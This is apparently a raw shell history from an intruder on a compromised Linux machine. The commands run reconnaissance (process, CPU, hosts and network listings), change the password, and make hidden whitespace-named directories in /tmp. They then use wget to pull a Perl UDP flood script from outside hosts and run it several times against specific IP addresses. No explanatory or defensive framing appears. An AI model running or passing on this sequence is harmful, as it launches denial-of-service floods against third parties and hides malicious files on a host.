ls
ls -la
w
uptime
passwd
cd /tmp
ls -la
ps -aux
mkdir .' '
cd .' '
mkdir ' '
cd ' '
ftp darkiy.site.io
wget
wget bogdi.net/downloads/udp.tar.gz 
tar -xzvf udp.tar.gz
rm -rf udp.tar.gz
wget http://y2khom3.evonet.ro/udp.pl
ls -la
perl udp.pl 35.226.252.193 0 0
chmod +x *
ls
perl udp.pl 83.50.82.107 0 0
perl udp.pl 83.50.82.107 0 0
ls
wget http://y2khom3.evonet.ro/udp.zip
perl udp.pl 83.50.82.107 0 0
cat /proc/cpuinfo
ls -la
cat /etc/issue
etc/rc.d/init.d
cat /etc/hosts
netstat -aut
cat /etc/hosts
logout
